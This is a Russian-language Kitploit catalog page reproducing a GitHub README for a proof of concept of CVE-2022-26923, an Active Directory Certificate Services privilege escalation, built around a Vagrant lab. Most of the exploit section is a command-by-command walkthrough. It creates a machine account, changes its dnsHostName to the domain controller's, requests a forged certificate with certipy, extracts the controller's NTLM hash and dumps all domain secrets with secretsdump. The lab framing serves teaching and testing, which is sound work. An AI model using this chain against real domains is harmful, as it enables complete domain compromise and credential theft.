Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26923 — Доказательство концепции, эксплуатирующее CVE-2022-26923. | Kitploit
Инструменты/GitHubGitHub/gh-badr/cve-2022-26923
Повышение привилегийЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubgh-badr/cve-2022-26923

CVE-2022-26923

Доказательство концепции, эксплуатирующее CVE-2022-26923.

Репозиторий
2212 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-26923

Описание

Эта уязвимость позволяла пользователю с низкими привилегиями повысить их до администратора домена в среде Active Directory по умолчанию с установленной ролью сервера Active Directory Certificate Services (AD CS).

Она в основном связана с ролью Active Directory Certificate Services (AD CS). Роль AD CS — это роль сервера Windows Server, которая позволяет построить инфраструктуру открытых ключей (PKI) и предоставить возможности криптографии с открытым ключом, цифровых сертификатов и цифровых подписей для вашей организации. Роль AD CS используется для выдачи сертификатов пользователям, компьютерам и службам.

Содержание

  • CVE-2022-26923
    • Описание
    • Содержание
    • Предварительные требования
    • Среда
    • Эксплойт
    • Подтверждение концепции
    • Ссылки

Предварительные требования

  • Vagrant
  • VirtualBox

Среда

Используемая версия Windows Server — Windows Server 2019 Standard Evaluation, которая является уязвимой версией. Предоставленный Vagrantfile (в папке Vulnerable Machine) создаст виртуальную машину Windows Server 2019 с установленной и настроенной ролью AD CS, а также пользователя с низкими привилегиями со следующими учетными данными:

  • Имя пользователя: user
  • Пароль: V@grant1

Чтобы создать среду, выполните следующие шаги:

  • Сначала клонируйте репозиторий и перейдите в каталог CVE-2022-26923:
    root@kitploit:~
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    
  • Если вам нужно изменить IP-адрес по умолчанию, вы можете сделать это в Vagrantfile, заменив IP-адрес в следующей строке:
    root@kitploit:~
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    
  • Затем выполните следующую команду для создания виртуальной машины:
    root@kitploit:~
    cd 'Vulnerable Machine'
    vagrant up
    
  • Если у вас нет машины Linux с установленным certipy, вы можете использовать предоставленную машину Vagrant в каталоге Attacker Machine, выполнив следующую команду:
    root@kitploit:~
    cd 'Attacker Machine'
    vagrant up
    

Папка Attacker Machine содержит машину Vagrant вместе со скриптом оболочки, который установит последнюю версию certipy. Вы также можете использовать скрипт для установки certipy на вашей машине Linux.

Эксплойт

Чтобы подключиться к атакующей машине, выполните следующую команду из каталога Attacker Machine:

root@kitploit:~
vagrant ssh

Теперь, когда вы находитесь на атакующей машине, вам нужно добавить IP-адрес сервера Windows Server в файл hosts:

root@kitploit:~
echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts

Примечание: Если вы изменили IP-адрес в Vagrantfile уязвимой машины, вам нужно изменить его и здесь.

Затем давайте создадим новую учетную запись компьютера в домене:

root@kitploit:~
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'

Чтобы убедиться, что учетная запись компьютера создана, подключитесь к уязвимой машине с пользователем user и паролем V@grant1, выполнив следующую команду из каталога Vulnerable Machine:

root@kitploit:~
vagrant ssh

Затем выполните следующую команду, чтобы убедиться, что учетная запись компьютера создана:

root@kitploit:~
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName

Эта учетная запись машины имеет dnsHostName CVEPC.vagrant.local. Наша цель — изменить этот dnsHostName на VAGRANT-K51B6U3.vagrant.local, который является контроллером домена.

Для этого сначала необходимо удалить имя участника-службы (SPN) из учетной записи компьютера CVEPC, выполнив следующую команду:

root@kitploit:~
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}

Затем мы можем изменить dnsHostName на VAGRANT-K51B6U3.vagrant.local, выполнив следующую команду:

root@kitploit:~
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
  • Примечание: Чтобы понять, почему пришлось удалить SPN учетной записи компьютера, обратитесь к проекту Report (на французском). Или вы можете ознакомиться с первой статьей в разделе ссылок, которая содержит подробное объяснение от автора CVE.

Теперь, когда у нас есть учетная запись компьютера с dnsHostName VAGRANT-K51B6U3.vagrant.local, мы можем запросить вредоносный сертификат с уязвимой машины, выполнив следующую команду на атакующей машине:

root@kitploit:~
certipy req -username '[email protected]' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local

В текущем каталоге должен появиться сертификат с именем vagrant-k51b6u3.pfx. Чтобы проверить, что сертификат действителен, используйте инструмент auth из набора certipy, выполнив следующую команду:

root@kitploit:~
certipy auth -pfx vagrant-k51b6u3.pfx

Если сертификат действителен, вы должны получить NTLM-хэш контроллера домена. Его можно использовать многими вредоносными способами.

Подтверждение концепции

В качестве подтверждения концепции мы можем использовать NTLM-хэш для извлечения всех секретов, хранящихся в домене (как описано в статье автора CVE). Для этого мы можем использовать инструмент secretsdump.py из набора impacket (который устанавливается вместе с последней версией certipy).

Для использования инструмента выполните следующую команду:

root@kitploit:~
secretsdump.py 'vagrant.local/[email protected]' -hashes :<NTLM hash>

Замените <NTLM hash> на NTLM-хэш, полученный на предыдущем шаге.

В результате вы должны получить все секреты, хранящиеся в домене.

Ссылки

  • Certifried: Повышение привилегий в домене Active Directory (CVE-2022-26923)
  • GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  • Try Hack Me - CVE-2022-26923
Скачать инструмент